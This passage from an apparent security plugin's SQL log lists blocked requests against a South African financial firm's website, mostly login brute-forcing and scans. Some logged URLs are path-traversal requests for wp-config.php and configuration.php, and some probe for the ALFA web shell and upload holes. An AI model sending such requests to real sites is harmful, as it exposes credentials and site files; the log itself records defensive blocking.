13:36:44','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/wpwhatsmyrankvideoregular-unlimited/php-ofc-library/ofc_upload_image.php','404shield',''),(4930,'2021-12-04 01:39:22','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/wp-business-intelligence-lite/resources/open-flash-chart/php-ofc-library/ofc_upload_image.php','404shield',''),(4931,'2021-12-04 12:32:35','95.105.65.146','https://smithandsmith.co.za/contact/','httpbl',''),(4932,'2021-12-04 12:32:36','95.105.65.146','https://smithandsmith.co.za/','httpbl',''),(4933,'2021-12-04 12:32:36','95.105.65.146','https://smithandsmith.co.za/','httpbl',''),(4934,'2021-12-04 13:43:28','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/woopra/inc/php-ofc-library/ofc_upload_image.php','404shield',''),(4935,'2021-12-05 11:20:58','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/wp-seo-spy-google/ofc/php-ofc-library/ofc_upload_image.php','404shield',''),(4936,'2021-12-05 19:48:50','212.192.241.6','https://smithandsmith.co.za/wp-admin/css/','404shield',''),(4937,'2021-12-06 07:34:30','164.68.110.108','https://smithandsmith.co.za/wp-login.php','404shield',''),(4938,'2021-12-06 07:34:30','164.68.110.108','https://smithandsmith.co.za/wp-login.php','404shield',''),(4939,'2021-12-06 10:48:26','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/formidable/pro/js/ofc-library/ofc_upload_image.php','404shield',''),(4940,'2021-12-06 13:01:59','217.70.186.133','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(4941,'2021-12-07 01:17:51','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/ip-logger/chart/ofc_upload_image.php','404shield',''),(4942,'2021-12-07 01:25:53','178.18.245.82','https://smithandsmith.co.za/wp-login.php','404shield',''),(4943,'2021-12-07 10:46:06','139.162.154.146','https://smithandsmith.co.za/wp-login.php','404shield',''),(4944,'2021-12-07 10:46:07','139.162.154.146','https://smithandsmith.co.za/wp-login.php','404shield',''),(4945,'2021-12-07 10:46:07','139.162.154.146','https://smithandsmith.co.za/wp-login.php','404shield',''),(4946,'2021-12-07 13:00:11','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/open-flash-chart-core-wordpress-plugin/open-flash-chart-2/php-ofc-library/ofc_upload_image.php','404shield',''),(4947,'2021-12-08 01:06:54','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/spamtask/chart/php-ofc-library/ofc_upload_image.php','404shield',''),(4948,'2021-12-08 05:40:36','185.231.59.189','https://smithandsmith.co.za/wp-login.php','404shield',''),(4949,'2021-12-08 05:40:36','185.231.59.189','https://smithandsmith.co.za/wp-login.php','404shield',''),(4950,'2021-12-08 13:15:57','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/seo-spy-google-wordpress-plugin/ofc/php-ofc-library/ofc_upload_image.php','404shield',''),(4951,'2021-12-08 17:57:50','94.180.139.91','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(4952,'2021-12-08 17:57:50','94.180.139.91','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(4953,'2021-12-09 04:52:01','120.79.29.217','https://smithandsmith.co.za/wp-login.php','404shield',''),(4954,'2021-12-09 08:40:07','107.150.63.174','https://smithandsmith.co.za/wp-login.php','404shield',''),(4955,'2021-12-09 08:40:56','107.150.63.174','https://smithandsmith.co.za/wp-login.php','404shield',''),(4956,'2021-12-09 08:58:13','107.150.63.174','https://smithandsmith.co.za/wp-login.php','404shield',''),(4957,'2021-12-09 08:58:55','107.150.63.174','https://smithandsmith.co.za/wp-login.php','404shield',''),(4958,'2021-12-09 11:13:30','185.246.208.51','https://smithandsmith.co.za/wp-login.php','404shield',''),(4959,'2021-12-09 11:13:30','185.246.208.51','https://smithandsmith.co.za/wp-login.php','404shield',''),(4960,'2021-12-09 11:13:30','185.246.208.51','https://smithandsmith.co.za/wp-login.php','404shield',''),(4961,'2021-12-09 17:36:25','192.64.150.99','https://smithandsmith.co.za/wp-login.php','404shield',''),(4962,'2021-12-09 23:04:57','145.239.8.229','https://smithandsmith.co.za/wp-login.php','404shield',''),(4963,'2021-12-10 12:24:48','37.0.10.46','https://smithandsmith.co.za/wp-admin/css/','404shield',''),(4964,'2021-12-10 16:26:57','107.150.63.171','https://smithandsmith.co.za/wp-login.php','404shield',''),(4965,'2021-12-10 16:34:10','107.150.63.171','https://smithandsmith.co.za/wp-login.php','404shield',''),(4966,'2021-12-11 02:59:58','35.195.135.67','https://smithandsmith.co.za/wp-login.php','404shield',''),(4967,'2021-12-11 02:59:58','35.195.135.67','https://smithandsmith.co.za/wp-login.php','404shield',''),(4968,'2021-12-11 05:14:26','176.53.65.237','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(4969,'2021-12-11 08:06:51','66.94.118.58','https://smithandsmith.co.za///wp-admin/setup-config.php','404shield',''),(4970,'2021-12-11 08:18:31','212.227.12.174','https://smithandsmith.co.za/wp-admin/css/','404shield',''),(4971,'2021-12-11 10:18:59','167.114.173.203','https://smithandsmith.co.za/wp-admin/install.php','404shield',''),(4972,'2021-12-11 10:18:59','167.114.173.203','https://smithandsmith.co.za/wp-login.php','404shield',''),(4973,'2021-12-11 10:52:29','168.119.98.231','https://smithandsmith.co.za/wp-login.php','404shield',''),(4974,'2021-12-11 11:43:01','107.150.63.172','https://smithandsmith.co.za/wp-login.php','404shield',''),(4975,'2021-12-11 11:43:36','107.150.63.172','https://smithandsmith.co.za/wp-login.php','404shield',''),(4976,'2021-12-11 11:44:11','107.150.63.172','https://smithandsmith.co.za/wp-login.php','404shield',''),(4977,'2021-12-12 05:58:22','35.188.63.26','https://smithandsmith.co.za/wp-login.php','404shield',''),(4978,'2021-12-12 11:37:53','144.217.170.24','https://smithandsmith.co.za/wp-login.php','404shield',''),(4979,'2021-12-12 11:37:53','144.217.170.24','https://smithandsmith.co.za/wp-login.php','404shield',''),(4980,'2021-12-12 14:10:14','185.162.147.26','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(4981,'2021-12-12 18:06:10','212.192.246.138','http://smithandsmith.co.za/components/com_contushdvideoshare/hdflvplayer/download.php?f=../../../configuration.php','dfishield',''),(4982,'2021-12-12 18:06:10','212.192.246.138','http://smithandsmith.co.za/index.php?option=com_addproperty&task=listing&propertyId=73&action=filedownload&fname=../configuration.php','dfishield',''),(4983,'2021-12-12 18:06:11','212.192.246.138','http://smithandsmith.co.za/components/com_hdflvplayer/hdflvplayer/download.php?f=../../../configuration.php','dfishield',''),(4984,'2021-12-12 18:12:05','212.192.241.140','https://smithandsmith.co.za/wp-content/plugins/t_file_wp/t_file_wp.php?test=hello','404shield',''),(4985,'2021-12-12 18:12:24','212.192.241.140','https://smithandsmith.co.za/wp-content/plugins/backup_index.php','404shield',''),(4986,'2021-12-12 18:12:27','212.192.241.140','https://smithandsmith.co.za/wp-content/db_cache.php','404shield',''),(4987,'2021-12-14 00:22:34','46.161.11.6','https://smithandsmith.co.za/faq-s','httpbl',''),(4988,'2021-12-14 00:22:34','46.161.11.6','https://smithandsmith.co.za/','httpbl',''),(4989,'2021-12-14 00:22:40','46.161.11.6','https://smithandsmith.co.za/index.php?option=com_easyblog&view=dashboard&layout=write','httpbl',''),(4990,'2021-12-14 10:30:21','85.202.169.18','https://www.smithandsmith.co.za/wp-admin/css/','404shield',''),(4991,'2021-12-14 10:31:49','85.202.169.18','https://smithandsmith.co.za/wp-admin/css/','404shield',''),(4992,'2021-12-14 10:38:57','37.0.10.46','https://smithandsmith.co.za/wp-admin/css/','404shield',''),(4993,'2021-12-14 11:53:50','155.94.222.11','http://www.smithandsmith.co.za//administrator/index.php','adminpw',''),(4994,'2021-12-14 11:53:52','155.94.222.11','http://www.smithandsmith.co.za//administrator/index.php','adminpw',''),(4995,'2021-12-14 11:53:55','155.94.222.11','http://www.smithandsmith.co.za//administrator/index.php','adminpw',''),(4996,'2021-12-14 14:03:32','46.161.11.6','https://www.smithandsmith.co.za/about-smith-and-smith-financial-solutions','httpbl',''),(4997,'2021-12-14 14:03:32','46.161.11.6','https://www.smithandsmith.co.za/','httpbl',''),(4998,'2021-12-14 14:03:37','46.161.11.6','https://www.smithandsmith.co.za/index.php?option=com_easyblog&view=dashboard&layout=write','httpbl',''),(4999,'2021-12-15 05:47:51','139.59.243.178','https://smithandsmith.co.za/wp-login.php','404shield',''),(5000,'2021-12-16 05:38:42','103.153.214.231','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(5001,'2021-12-16 06:45:19','216.158.230.167','https://smithandsmith.co.za/wp-login.php','404shield',''),(5002,'2021-12-16 08:55:06','185.174.159.19','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(5003,'2021-12-16 09:12:27','85.202.169.18','https://www.smithandsmith.co.za/wp-admin/css/','404shield',''),(5004,'2021-12-16 09:13:33','85.202.169.18','https://smithandsmith.co.za/wp-admin/css/','404shield',''),(5005,'2021-12-16 10:20:37','45.158.15.144','https://smithandsmith.co.za/wp-login.php','404shield',''),(5006,'2021-12-16 14:25:10','64.235.231.20','https://smithandsmith.co.za/wp-login.php','404shield',''),(5007,'2021-12-17 03:07:08','87.118.110.27','http://smithandsmith.co.za/contact/','httpbl',''),(5008,'2021-12-17 03:07:12','87.118.110.27','http://smithandsmith.co.za/','httpbl',''),(5009,'2021-12-17 07:19:08','46.161.11.6','https://www.smithandsmith.co.za/smith-and-smith-personal-solutions','httpbl',''),(5010,'2021-12-17 07:19:09','46.161.11.6','https://www.smithandsmith.co.za/','httpbl',''),(5011,'2021-12-17 07:19:10','46.161.11.6','https://www.smithandsmith.co.za/index.php?option=com_easyblog&view=dashboard&layout=write','httpbl',''),(5012,'2021-12-17 11:44:32','103.130.218.132','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(5013,'2021-12-18 01:27:04','173.249.11.108','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(5014,'2021-12-18 03:58:40','189.48.120.2','https://smithandsmith.co.za/wp-login.php','404shield',''),(5015,'2021-12-18 03:59:11','189.48.120.2','http://smithandsmith.co.za/administrator/','adminpw',''),(5016,'2021-12-18 04:26:08','185.38.175.132','http://smithandsmith.co.za/contact/','httpbl',''),(5017,'2021-12-18 04:26:14','91.132.147.168','http://smithandsmith.co.za/','httpbl',''),(5018,'2021-12-18 04:26:19','109.70.100.23','http://smithandsmith.co.za/contact/','httpbl',''),(5019,'2021-12-18 04:26:19','109.70.100.23','http://smithandsmith.co.za/','httpbl',''),(5020,'2021-12-18 08:06:32','20.70.0.204','http://www.smithandsmith.co.za/administrator/index.php','adminpw',''),(5021,'2021-12-18 08:07:32','20.70.0.204','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(5022,'2021-12-18 10:14:45','185.174.159.19','https://smithandsmith.co.za/wp-login.php','404shield',''),(5023,'2021-12-18 10:14:46','185.174.159.19','https://smithandsmith.co.za/wp-login.php','404shield',''),(5024,'2021-12-18 11:22:32','192.241.177.127','https://smithandsmith.co.za/wp-login.php','404shield',''),(5025,'2021-12-18 21:28:13','206.189.239.86','https://smithandsmith.co.za/wp-login.php','404shield',''),(5026,'2021-12-18 21:28:13','206.189.239.86','https://smithandsmith.co.za/wp-login.php','404shield',''),(5027,'2021-12-19 05:05:29','94.23.86.99','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(5028,'2021-12-19 08:31:54','109.70.100.36','http://smithandsmith.co.za/contact/','httpbl',''),(5029,'2021-12-19 08:31:55','109.70.100.36','http://smithandsmith.co.za/','httpbl',''),(5030,'2021-12-19 18:01:10','23.148.145.101','https://smithandsmith.co.za/wp-login.php','404shield',''),(5031,'2021-12-19 22:16:39','194.87.190.39','https://smithandsmith.co.za/wp-login.php','404shield',''),(5032,'2021-12-19 22:19:45','95.105.65.146','https://smithandsmith.co.za/contact/','httpbl',''),(5033,'2021-12-19 22:19:46','95.105.65.146','https://smithandsmith.co.za/','httpbl',''),(5034,'2021-12-19 22:19:46','95.105.65.146','https://smithandsmith.co.za/','httpbl',''),(5035,'2021-12-19 22:55:11','23.146.241.226','https://smithandsmith.co.za/wp-login.php','404shield',''),(5036,'2021-12-20 03:16:03','185.220.101.18','http://smithandsmith.co.za/contact/','httpbl',''),(5037,'2021-12-20 03:16:04','185.220.101.18','http://smithandsmith.co.za/','httpbl',''),(5038,'2021-12-22 17:17:19','35.193.222.165','https://smithandsmith.co.za/wp-login.php','404shield',''),(5039,'2021-12-23 15:55:25','148.251.128.71','https://smithandsmith.co.za/wp-login.php','404shield',''),(5040,'2021-12-24 10:00:36','185.220.101.167','http://smithandsmith.co.za/contact/','httpbl',''),(5041,'2021-12-24 10:00:37','185.220.101.167','http://smithandsmith.co.za/','httpbl',''),(5042,'2021-12-24 10:00:39','109.70.100.20','http://smithandsmith.co.za/contact/','httpbl',''),(5043,'2021-12-24 10:00:40','109.70.100.20','http://smithandsmith.co.za/','httpbl',''),(5044,'2021-12-24 10:00:42','176.10.104.240','http://smithandsmith.co.za/contact/','httpbl',''),(5045,'2021-12-24 10:00:42','176.10.104.240','http://smithandsmith.co.za/','httpbl',''),(5046,'2021-12-24 18:05:18','5.183.209.134','http://smithandsmith.co.za/contact/','httpbl',''),(5047,'2021-12-24 18:05:19','5.183.209.134','http://smithandsmith.co.za/','httpbl',''),(5048,'2021-12-24 18:05:21','91.219.237.21','http://smithandsmith.co.za/contact/','httpbl',''),(5049,'2021-12-24 18:05:22','91.219.237.21','http://smithandsmith.co.za/','httpbl',''),(5050,'2021-12-24 23:33:31','51.15.240.178','https://smithandsmith.co.za/wp-login.php','404shield',''),(5051,'2021-12-25 02:45:10','122.116.48.250','https://smithandsmith.co.za/wp-login.php','404shield',''),(5052,'2021-12-25 14:36:07','167.71.111.16','https://smithandsmith.co.za/wp-login.php','404shield',''),(5053,'2021-12-25 23:39:49','42.200.169.14','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(5054,'2021-12-26 02:29:15','46.166.139.111','http://smithandsmith.co.za/wp-json/wp/v2/posts','httpbl',''),(5055,'2021-12-26 16:35:18','67.222.152.219','https://smithandsmith.co.za/wp-login.php','404shield',''),(5056,'2021-12-27 01:37:54','203.114.114.155','https://smithandsmith.co.za/wp-login.php','404shield',''),(5057,'2021-12-27 01:37:54','203.114.114.155','https://smithandsmith.co.za/wp-login.php','404shield',''),(5058,'2021-12-27 01:37:54','203.114.114.155','https://smithandsmith.co.za/wp-login.php','404shield',''),(5059,'2021-12-27 09:31:58','94.230.208.148','http://smithandsmith.co.za/contact/','httpbl',''),(5060,'2021-12-27 09:31:59','94.230.208.148','http://smithandsmith.co.za/','httpbl',''),(5061,'2021-12-27 09:32:01','185.220.100.255','http://smithandsmith.co.za/contact/','httpbl',''),(5062,'2021-12-27 09:32:02','185.220.100.255','http://smithandsmith.co.za/','httpbl',''),(5063,'2021-12-27 12:29:21','42.193.17.124','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(5064,'2021-12-27 19:36:23','148.72.210.140','https://smithandsmith.co.za/wp-login.php','404shield',''),(5065,'2021-12-27 19:36:23','148.72.210.140','https://smithandsmith.co.za/wp-login.php','404shield',''),(5066,'2021-12-27 21:55:39','174.138.33.114','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(5067,'2021-12-28 20:52:52','77.68.27.144','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(5068,'2021-12-29 01:04:04','185.220.102.242','http://smithandsmith.co.za/contact/','httpbl',''),(5069,'2021-12-29 01:04:05','185.220.102.242','http://smithandsmith.co.za/','httpbl',''),(5070,'2021-12-29 02:36:56','154.16.49.23','https://smithandsmith.co.za/wp-login.php','404shield',''),(5071,'2021-12-29 06:15:40','195.201.212.162','https://smithandsmith.co.za/wp-login.php','404shield',''),(5072,'2021-12-29 13:04:54','45.153.160.139','http://smithandsmith.co.za/contact/','httpbl',''),(5073,'2021-12-29 13:04:54','45.153.160.139','http://smithandsmith.co.za/','httpbl',''),(5074,'2021-12-30 02:14:02','20.127.125.189','https://smithandsmith.co.za/wp-content/uploads/ALFA_DATA/alfacgiapi/perl.alfa','404shield',''),(5075,'2021-12-30 02:14:09','20.127.125.189','https://smithandsmith.co.za/wp-content/uploads/ALFA_DATA/alfacgiapi/bash.alfa','404shield',''),(5076,'2021-12-30 02:14:16','20.127.125.189','https://smithandsmith.co.za/wp-content/uploads/ALFA_DATA/alfacgiapi/py.alfa','404shield',''),(5077,'2021-12-30 07:33:45','213.202.216.189','http://smithandsmith.co.za/contact/','httpbl',''),(5078,'2021-12-30 07:33:45','213.202.216.189','http://smithandsmith.co.za/','httpbl',''),(5079,'2021-12-30 07:33:46','213.202.216.189','http://smithandsmith.co.za/contact/','httpbl',''),(5080,'2021-12-30 08:37:45','184.168.99.160','https://smithandsmith.co.za/wp-login.php','404shield',''),(5081,'2021-12-30 19:18:16','51.15.160.148','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(5082,'2021-12-31 01:24:45','109.70.100.34','http://smithandsmith.co.za/contact/','httpbl',''),(5083,'2021-12-31 01:24:46','109.70.100.34','http://smithandsmith.co.za/','httpbl',''),(5084,'2021-12-31 01:24:47','185.220.100.252','http://smithandsmith.co.za/contact/','httpbl',''),(5085,'2021-12-31 01:24:48','185.220.100.252','http://smithandsmith.co.za/','httpbl',''),(5086,'2021-12-31 01:24:50','43.251.159.144','http://smithandsmith.co.za/contact/','httpbl',''),(5087,'2021-12-31 01:24:52','43.251.159.144','http://smithandsmith.co.za/','httpbl',''),(5088,'2021-12-31 03:32:43','195.206.105.217','http://smithandsmith.co.za/contact/','httpbl',''),(5089,'2021-12-31 03:32:46','185.220.101.2','http://smithandsmith.co.za/','httpbl',''),(5090,'2021-12-31 05:59:00','206.253.164.122','http://smithandsmith.co.zahttp//smithandsmith.co.za/contact/','httpbl',''),(5091,'2022-01-01 01:13:32','120.79.29.217','https://smithandsmith.co.za/wp-login.php','404shield',''),(5092,'2022-01-01 05:11:47','188.166.182.92','https://smithandsmith.co.za/wp-admin/setup-config.php?step=1','404shield',''),(5093,'2022-01-01 05:11:53','188.166.182.92','http://smithandsmith.co.za/administrator/','adminpw',''),(5094,'2022-01-02 07:25:51','102.165.48.97','https://smithandsmith.co.za/wp-login.php','404shield',''),(5095,'2022-01-02 07:25:52','102.165.48.97','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(5096,'2022-01-02 11:17:13','103.93.149.248','https://smithandsmith.co.za/wp-login.php','404shield',''),(5097,'2022-01-02 11:17:41','39.106.105.38','https://smithandsmith.co.za/wp-login.php','404shield',''),(5098,'2022-01-03 04:37:49','185.3.235.251','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(5099,'2022-01-04 04:19:07','124.40.255.186','https://smithandsmith.co.za/wp-login.php','404shield',''),(5100,'2022-01-04 04:19:07','124.40.255.186','https://smithandsmith.co.za/wp-login.php','404shield',''),(5101,'2022-01-04 07:23:26','72.167.68.223','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(5102,'2022-01-05 03:16:15','47.92.68.165','https://smithandsmith.co.za/wp-login.php','404shield',''),(5103,'2022-01-05 05:32:08','2.56.59.163','https://smithandsmith.co.za/wp-admin/css/','404shield',''),(5104,'2022-01-06 07:12:24','185.101.158.220','https://smithandsmith.co.za/wp-login.php','404shield',''),(5105,'2022-01-06 09:32:14','213.149.103.132','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(5106,'2022-01-07 03:15:56','47.108.179.31','https://smithandsmith.co.za/wp-login.php','404shield',''),(5107,'2022-01-07 08:38:51','202.142.159.204','https://smithandsmith.co.za/wp-login.php','404shield',''),(5108,'2022-01-07 16:44:42','101.0.97.134','https://smithandsmith.co.za/wp-login.php','404shield',''),(5109,'2022-01-07 22:40:59','159.223.91.63','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(5110,'2022-01-08 02:13:40','91.202.45.27','https://smithandsmith.co.za/wp-login.php?action=register','404shield',''),(5111,'2022-01-08 09:11:12','218.250.136.249','https://smithandsmith.co.za/wp-login.php','404shield',''),(5112,'2022-01-09 05:31:28','196.218.22.172','https://smithandsmith.co.za/wp-login.php','404shield',''),(5113,'2022-01-09 05:31:28','196.218.22.172','https://smithandsmith.co.za/wp-login.php','404shield',''),(5114,'2022-01-09 05:31:28','196.218.22.172','https://smithandsmith.co.za/wp-login.php','404shield',''),(5115,'2022-01-09 06:48:44','37.0.11.64','https://smithandsmith.co.za/wp-admin/css/','404shield',''),(5116,'2022-01-09 09:22:24','185.220.101.46','http://smithandsmith.co.za/wp-json/wp/v2/posts','httpbl',''),(5117,'2022-01-09 09:22:27','185.220.102.246','http://smithandsmith.co.za/wp-json/wp/v2/posts','httpbl',''),(5118,'2022-01-09 10:43:43','85.202.169.83','https://smithandsmith.co.za/wp-admin/admin.php','404shield',''),(5119,'2022-01-09 11:30:55','34.66.163.149','https://smithandsmith.co.za/wp-login.php','404shield',''),(5120,'2022-01-09 14:59:46','89.208.222.128','https://smithandsmith.co.za/wp-login.php','404shield',''),(5121,'2022-01-09 15:07:29','89.208.222.128','https://smithandsmith.co.za/wp-login.php','404shield',''),(5122,'2022-01-09 15:17:01','89.208.222.128','https://smithandsmith.co.za/wp-login.php','404shield',''),(5123,'2022-01-09 19:19:17','103.111.30.40','https://smithandsmith.co.za/wp-login.php','404shield',''),(5124,'2022-01-09 19:19:17','103.111.30.40','https://smithandsmith.co.za/wp-login.php','404shield',''),(5125,'2022-01-10 01:58:49','35.193.222.165','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(5126,'2022-01-10 14:57:54','65.108.105.247','https://smithandsmith.co.za/wp-content/uploads/ALFA_DATA/alfacgiapi/perl.alfa','404shield',''),(5127,'2022-01-10 14:58:28','65.108.105.247','https://smithandsmith.co.za/wp-content/uploads/alfacgiapi/perl.alfa','404shield',''),(5128,'2022-01-10 14:58:53','65.108.105.247','https://www.smithandsmith.co.za/wp-content/uploads/ALFA_DATA/alfacgiapi/perl.alfa','404shield',''),(5129,'2022-01-10 17:18:34','89.163.154.91','http://smithandsmith.co.za/contact/','httpbl',''),(5130,'2022-01-10 17:18:35','185.220.101.6','http://smithandsmith.co.za/','httpbl',''),(5131,'2022-01-11 01:09:51','103.93.149.248','https://smithandsmith.co.za/wp-login.php','404shield',''),(5132,'2022-01-11 01:09:51','103.93.149.248','https://smithandsmith.co.za/wp-login.php','404shield',''),(5133,'2022-01-11 06:13:04','159.89.2.220','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(5134,'2022-01-12 03:13:44','8.141.58.239','https://smithandsmith.co.za/wp-login.php','404shield',''),(5135,'2022-01-12 09:25:36','180.76.146.169','http://smithandsmith.co.za/contact/','httpbl',''),(5136,'2022-01-12 09:25:45','180.76.146.169','http://smithandsmith.co.za/','httpbl',''),(5137,'2022-01-12 16:41:04','62.210.28.50','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(5138,'2022-01-13 03:04:47','2.58.149.35','https://www.smithandsmith.co.za/wp-content/uploads/ALFA_DATA/alfacgiapi/perl.alfa','404shield',''),(5139,'2022-01-13 03:05:16','2.58.149.35','https://www.smithandsmith.co.za/wp-content/uploads/alfacgiapi/perl.alfa','404shield',''),(5140,'2022-01-13 15:12:10','184.168.100.242','https://smithandsmith.co.za/wp-login.php','404shield',''),(5141,'2022-01-14 09:33:49','5.188.62.140','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5142,'2022-01-14 09:35:27','185.220.102.249','http://smithandsmith.co.za/contact/','httpbl',''),(5143,'2022-01-14 09:35:27','185.220.102.249','http://smithandsmith.co.za/','httpbl',''),(5144,'2022-01-15 16:47:55','37.61.232.10','https://smithandsmith.co.za/wp-login.php','404shield',''),(5145,'2022-01-15 16:47:55','37.61.232.10','https://smithandsmith.co.za/wp-login.php','404shield',''),(5146,'2022-01-15 18:29:35','160.251.28.21','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(5147,'2022-01-16 05:38:59','185.56.80.65','http://smithandsmith.co.za/?feed=rss2','httpbl',''),(5148,'2022-01-16 09:03:38','5.188.62.140','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5149,'2022-01-16 10:02:26','185.220.101.35','http://smithandsmith.co.za/contact/','httpbl',''),(5150,'2022-01-16 10:02:28','195.176.3.24','http://smithandsmith.co.za/','httpbl',''),(5151,'2022-01-16 10:02:30','89.163.252.230','http://smithandsmith.co.za/contact/','httpbl',''),(5152,'2022-01-16 10:02:31','89.163.252.230','http://smithandsmith.co.za/','httpbl',''),(5153,'2022-01-16 10:02:31','89.163.252.230','http://smithandsmith.co.za/contact/','httpbl',''),(5154,'2022-01-16 10:02:38','185.220.100.245','https://smithandsmith.co.za/contact/','httpbl',''),(5155,'2022-01-16 10:02:41','185.220.100.245','https://smithandsmith.co.za/','httpbl',''),(5156,'2022-01-16 10:02:44','185.220.100.245','https://smithandsmith.co.za/','httpbl',''),(5157,'2022-01-17 01:44:04','54.196.131.32','https://smithandsmith.co.za/wp-login.php','404shield',''),(5158,'2022-01-17 01:44:04','54.196.131.32','https://smithandsmith.co.za/wp-login.php','404shield',''),(5159,'2022-01-17 01:44:04','54.196.131.32','https://smithandsmith.co.za/wp-login.php','404shield',''),(5160,'2022-01-17 02:12:19','50.16.70.138','https://smithandsmith.co.za/wp-login.php','404shield',''),(5161,'2022-01-17 02:12:19','50.16.70.138','https://smithandsmith.co.za/wp-login.php','404shield',''),(5162,'2022-01-17 02:12:20','50.16.70.138','https://smithandsmith.co.za/wp-login.php','404shield',''),(5163,'2022-01-17 04:18:05','52.250.19.31','https://smithandsmith.co.za/wp-login.php','404shield',''),(5164,'2022-01-17 04:18:05','52.250.19.31','https://smithandsmith.co.za/wp-login.php','404shield',''),(5165,'2022-01-17 04:18:05','52.250.19.31','https://smithandsmith.co.za/wp-login.php','404shield',''),(5166,'2022-01-17 08:37:11','184.168.98.206','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(5167,'2022-01-17 08:59:41','5.188.62.140','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5168,'2022-01-17 13:31:11','141.95.18.207','http://smithandsmith.co.za/1index.php','httpbl',''),(5169,'2022-01-17 15:54:23','50.16.70.138','https://smithandsmith.co.za/wp-login.php','404shield',''),(5170,'2022-01-17 15:54:23','50.16.70.138','https://smithandsmith.co.za/wp-login.php','404shield',''),(5171,'2022-01-17 15:54:23','50.16.70.138','https://smithandsmith.co.za/wp-login.php','404shield',''),(5172,'2022-01-17 17:33:05','39.106.105.38','https://smithandsmith.co.za/wp-login.php','404shield',''),(5173,'2022-01-18 17:38:20','185.142.239.49','http://smithandsmith.co.za/','httpbl',''),(5174,'2022-01-19 03:32:02','14.215.44.185','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(5175,'2022-01-19 04:40:12','195.211.45.155','https://smithandsmith.co.za/wp-login.php','404shield',''),(5176,'2022-01-19 09:08:19','5.188.62.140','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5177,'2022-01-19 19:44:54','92.205.7.127','https://smithandsmith.co.za/wp-login.php','404shield',''),(5178,'2022-01-21 09:03:59','5.188.62.140','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5179,'2022-01-21 22:47:00','51.91.7.5','https://smithandsmith.co.za/wp-admin/admin-ajax.php?action=duplicator_download&file=../wp-config.php','404shield',''),(5180,'2022-01-21 22:47:00','51.91.7.5','https://smithandsmith.co.za/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php','404shield',''),(5181,'2022-01-21 22:47:01','51.91.7.5','https://smithandsmith.co.za/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=../wp-config.php','404shield',''),(5182,'2022-01-22 00:56:27','180.76.146.169','http://smithandsmith.co.za/contact/','httpbl',''),(5183,'2022-01-22 00:56:30','180.76.146.169','http://smithandsmith.co.za/','httpbl',''),(5184,'2022-01-22 00:56:35','180.76.146.169','http://smithandsmith.co.za/contact/','httpbl',''),(5185,'2022-01-22 16:46:46','199.168.185.232','https://smithandsmith.co.za/wp-login.php','404shield',''),(5186,'2022-01-22 21:48:10','51.158.183.63','http://smithandsmith.co.za/contact/','httpbl',''),(5187,'2022-01-22 21:48:11','51.158.183.63','http://smithandsmith.co.za/','httpbl',''),(5188,'2022-01-23 04:46:08','37.0.11.64','https://smithandsmith.co.za/wp-admin/css/','404shield',''),(5189,'2022-01-23 05:49:41','54.39.198.234','https://smithandsmith.co.za/wp-admin/css/','404shield',''),(5190,'2022-01-24 00:05:29','42.193.9.45','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(5191,'2022-01-24 02:52:31','165.227.115.229','https://smithandsmith.co.za/wp-login.php','404shield',''),(5192,'2022-01-24 20:03:37','128.199.109.135','https://smithandsmith.co.za/wp-login.php','404shield',''),(5193,'2022-01-24 21:58:58','72.167.42.45','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(5194,'2022-01-25 19:53:23','93.113.111.193','https://smithandsmith.co.za/wp-login.php','404shield',''),(5195,'2022-01-26 09:07:02','5.188.62.140','https://smithandsmith.co.za/administrator/index.php','adminpw',''),(5196,'2022-01-26 16:59:23','184.168.98.94','https://smithandsmith.co.za/wp-login.php','404shield',''),(5197,'2022-01-27 03:36:47','217.182.193.49','https://smithandsmith.co.za/wp-content/plugins/iwp-client/readme.txt','404shield',''),(5198,'2022-01-27 03:36:47','217.182.193.49','https://smithandsmith.co.za/wp-content/plugins/advanced-import/readme.txt','404shield',''),(5199,'2022-01-27 03:36:47','217.182.193.49','https://smithandsmith.co.za/wp-content/plugins/angwp/__%20UPDATES.txt','404shield',''),(5200,'2022-01-27 04:48:24','37.0.11.64','https://smithandsmith.co.za/wp-admin/css/','404shield',''),(5201,'2022-01-27 